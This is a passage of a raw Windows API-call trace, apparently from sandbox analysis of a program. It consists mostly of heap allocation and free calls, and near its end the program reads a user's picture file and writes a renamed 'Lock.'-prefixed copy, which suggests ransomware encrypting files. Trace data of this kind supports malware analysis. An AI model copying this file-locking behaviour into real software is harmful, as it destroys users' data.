hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0211.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0211.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0211.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0211.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0211.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0211.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0211.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0211.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0211.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0211.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0211.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74668 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a30 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0211.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0211.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0211.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0211.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0211.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x37f4320 [0211.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0211.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0211.899] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Wi_9DL5txr1IbTGlf8.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\wi_9dl5txr1ibtglf8.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0211.900] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.900] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0211.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0211.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.900] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0211.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0211.900] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0211.900] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0211.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0211.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0211.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0211.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x37f4248 [0211.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.901] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0211.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37f4248 | out: hHeap=0x2af0000) returned 1 [0211.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0211.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3854008 [0211.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0211.902] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.Wi_9DL5txr1IbTGlf8.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.wi_9dl5txr1ibtglf8.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0211.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0211.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0211.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0211.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0211.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0211.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0211.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0211.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e6020 [0211.907] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0211.907] 